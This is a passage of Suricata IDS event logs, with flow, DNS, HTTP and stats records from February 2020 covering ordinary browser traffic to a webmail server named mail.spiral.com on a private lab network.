n":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2658,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21161,"memcap_state":0,"memcap_global":0},"http":{"memuse":46893,"memcap":0}}} {"timestamp":"2020-02-29T00:03:30.001254+0000","flow_id":1530510154133066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":9,"bytes_toserver":1030,"bytes_toclient":7104,"start":"2020-02-29T00:02:23.847434+0000","end":"2020-02-29T00:02:29.118708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:32.247963+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36024,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:32.520894+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:32.537272+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269}} {"timestamp":"2020-02-29T00:03:33.000689+0000","flow_id":950942972546480,"event_type":"flow","src_ip":"192.168.10.81","src_port":52662,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":817,"start":"2020-02-29T00:02:28.560560+0000","end":"2020-02-29T00:02:28.994268+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000485+0000","flow_id":1466343343045982,"event_type":"flow","src_ip":"192.168.10.81","src_port":52666,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:02:28.572766+0000","end":"2020-02-29T00:02:33.574149+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000756+0000","flow_id":1520949557243714,"event_type":"flow","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1395,"bytes_toclient":2845,"start":"2020-02-29T00:02:28.569154+0000","end":"2020-02-29T00:02:33.575181+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:37.000214+0000","event_type":"stats","stats":{"uptime":13869,"capture":{"kernel_packets":132938,"kernel_drops":0},"decoder":{"pkts":132952,"bytes":92169556,"invalid":180,"ipv4":131519,"ipv6":8,"ethernet":132952,"raw":0,"null":0,"sll":0,"tcp":126489,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2662,"new_pruned":15,"est_pruned":2248,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102755,"memcap":0}}} {"timestamp":"2020-02-29T00:03:37.538019+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} {"timestamp":"2020-02-29T00:03:39.000249+0000","flow_id":432102333557313,"event_type":"flow","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1101,"bytes_toclient":4128,"start":"2020-02-29T00:02:33.535105+0000","end":"2020-02-29T00:02:38.758339+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:40.000465+0000","flow_id":484492329315239,"event_type":"flow","src_ip":"192.168.10.122","src_port":51089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:39.486311+0000","end":"2020-02-28T23:58:39.597883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:42.000363+0000","flow_id":1857713646178395,"event_type":"flow","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":23,"bytes_toserver":3176,"bytes_toclient":19569,"start":"2020-02-29T00:02:01.561243+0000","end":"2020-02-29T00:02:41.127250+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:42.001453+0000","flow_id":273776938932889,"event_type":"flow","src_ip":"192.168.10.122","src_port":42956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:41.744089+0000","end":"2020-02-28T23:58:41.855799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:44.000397+0000","event_type":"stats","stats":{"uptime":13876,"capture":{"kernel_packets":132957,"kernel_drops":0},"decoder":{"pkts":132959,"bytes":92170018,"invalid":180,"ipv4":131526,"ipv6":8,"ethernet":132959,"raw":0,"null":0,"sll":0,"tcp":126496,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2663,"new_pruned":15,"est_pruned":2249,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20831,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:03:45.000693+0000","flow_id":667500901523119,"event_type":"flow","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1130,"bytes_toclient":5052,"start":"2020-02-29T00:02:39.024239+0000","end":"2020-02-29T00:02:44.205454+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.000253+0000","flow_id":795211738668950,"event_type":"flow","src_ip":"192.168.10.122","src_port":48627,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:44.941974+0000","end":"2020-02-28T23:58:45.053386+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001136+0000","flow_id":139224203776181,"event_type":"flow","src_ip":"192.168.10.122","src_port":55264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:45.118965+0000","end":"2020-02-28T23:58:45.230467+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001351+0000","flow_id":612061463836783,"event_type":"flow","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1161,"bytes_toclient":7936,"start":"2020-02-29T00:02:41.129135+0000","end":"2020-02-29T00:02:46.724343+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.425157+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29425,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.581795+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31870,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.769072+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786}} {"timestamp":"2020-02-29T00:03:47.819724+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36714,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.821266+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:03:47.828479+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:03:47.829099+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:03:47.830450+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":2}} {"timestamp":"2020-02-29T00:03:47.847731+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:03:47.849620+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":3}} {"timestamp":"2020-02-29T00:03:47.893299+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:03:51.000241+0000","event_type":"stats","stats":{"uptime":13883,"capture":{"kernel_packets":132963,"kernel_drops":0},"decoder":{"pkts":133009,"bytes":92192150,"invalid":180,"ipv4":131576,"ipv6":8,"ethernet":133009,"raw":0,"null":0,"sll":0,"tcp":126542,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2666,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":7,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74606,"memcap":0}}} {"timestamp":"2020-02-29T00:03:52.000305+0000","flow_id":1433087412423287,"event_type":"flow","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1448,"bytes_toclient":5145,"start":"2020-02-29T00:02:46.215671+0000","end":"2020-02-29T00:02:51.772800+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:52.582941+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:03:52.854906+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":4}} {"timestamp":"2020-02-29T00:03:58.000296+0000","event_type":"stats","stats":{"uptime":13890,"capture":{"kernel_packets":133011,"kernel_drops":0},"decoder":{"pkts":133021,"bytes":92192846,"invalid":180,"ipv4":131584,"ipv6":8,"ethernet":133021,"raw":0,"null":0,"sll":0,"tcp":126550,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":